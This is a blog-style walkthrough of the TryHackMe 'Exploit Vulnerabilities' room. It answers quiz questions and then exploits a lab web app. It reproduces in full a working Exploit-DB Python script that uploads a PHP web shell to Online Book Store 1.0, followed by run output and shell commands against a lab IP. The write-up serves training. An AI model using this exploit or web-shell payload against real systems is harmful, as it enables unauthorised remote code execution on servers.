Exploit Vulnerabilities Walkthrough [TryHackMe]

I am going through the newly released Jr Penetration Tester Learning Path and I enjoyed this quick but cool challenge. I figured why not write a short and sweet walkthrough :)

Automated vs Manual Vulnerability Research

In this section we take a look at a brief introduction of vulnerability scanning. There is some basic information about Nessus Vulnerability Scanner and also a look at the difference between doing an automated scan vs a manual scan.

Answers:

You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay)
Yay. Time is a precious resource, you have to use the tools available to you and leverage to get the job done in time!

You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this?
Injection. This could be command injection or may be SQLi.

You manage to impersonate another user. What vulnerability is this?
Broken Access Control. Somewhere we are not sanitizing user input…

Finding Manual Exploits

Here we are looking at different tools / resources that we can leverage to get the work done!

Answers:

What website would you use as a security researcher if you wanted to upload a Proof of Concept?
GitHub. We can share codes and other such things there :)

You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?
Searchsploit.

Example of Manual Exploitation

Here it is shared that many exploits available to us may not be ready to go from the get go and may require modification.

Answers:

What type of vulnerability was used in this attack?
Remote Code Execution. The example showed us that we are able to run commands remotely.

Practical: Manual Exploitation

Lets put all these information in to practice!

Here we are given a target website. Mine was located at 10.10.9.18 .

I loaded http://10.10.9.18 through the web browser. I found the name and version of the web app in the right hand side of the page. We can take advantage of the disclosure of the app name and version number to see if we can find any vulnerabilities related to it.

I did a quick search for Online Book Store v1.0 exploit . After looking through some of the results, I found this one for an unauthenticated RCE in Exploit-DB: https://www.exploit-db.com/exploits/47887

# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-01-07
# Exploit Author: Tib3rius
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Ubuntu 16.04
# CVE: N/A

import argparse
import random
import requests
import string
import sys

parser = argparse.ArgumentParser()
parser.add_argument('url', action='store', help='The URL of the target.')
args = parser.parse_args()

url = args.url.rstrip('/')
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'

file = {'image': (random_file + '.php', payload, 'text/php')}
print('> Attempting to upload PHP web shell...')
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
print('> Verifying shell upload...')
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:
    print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
    print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
    if launch_shell.lower() == 'y':
        while True:
            cmd = str(input('RCE $ '))
            if cmd == 'exit':
                sys.exit(0)
            r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
            print(r.text)
else:
    if r.status_code == 200:
        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
    else:
        print('> Web shell failed to upload! The web server may not have write permissions.')

Let’s go over at the high level of what the code is doing…

• It takes the URL of the site as a parameter.
• It creates a random file name.
• This random file contains the simple code <?php echo shell_exec($_GET[\'cmd\']); ?>, which runs our web shell. This code literally just runs whatever input we give it as a command.
• It leverages the vulnerability to push this file that contains a very simple web shell.
• The application will now interpret the file as code and run our code. RCE!

Running The Exploit

After we download the exploit, I didn’t see a need to change or adjust any of the code. It looked pretty straight forward. To run it we give the command python ./47887.py http://10.10.9.18/, here is what that the output looks like:

python ./47887.py http://10.10.9.18/         
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php
> Example command usage: http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
Traceback (most recent call last):
  File "./47887.py", line 35, in <module>
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
  File "<string>", line 1, in <module>
NameError: name 'y' is not defined

From the output we can see that the code crashed, but that is not a worry to us since it looks like it was successful at uploading the web shell. This next part of the code is only used to allow us to interact with the website from this provided command line.

Next step is to test the web shell in the browser, let’s just run this url and see what we get:

http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=whoami
#Output:
www-data

Nice, let’s do a bit more digging:

#Command
http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=lsb_release+-a
#Output
Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic

#Command
http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=pwd
#Output
/var/www/html/bootstrap/img

#Command
http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=ls
#Output
2zQ3veqXvS.php OyWjgNLIbq.php android_studio.jpg beauty_js.jpg c_14_quick.jpg c_sharp_6.jpg doing_good.jpg flag.txt img1.jpg img2.jpg img3.jpg kotlin_250x250.png logic_program.jpg mobile_app.jpg pro_asp4.jpg pro_js.jpg unnamed.png web_app_dev.jpg

It looks like within this directory we have the flag.txt, which is what we are looking for. Let’s run the following http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=cat+flag.txt

#Output
`THM{B***_******G}`

As much I would love to just give you the flag, you need to put the skills into practice. If this walkthrough is not clear enough, reach out so you can do this too :)

RECAP

Here we took advantage the application name and version were displayed to us, some nice and easy OSINT. From there we researched to see if there was any known vulnerabilities for this app+version, then we found the exploit which allowed use to run code on the server. Updating the application would probably have more than likely prevented this.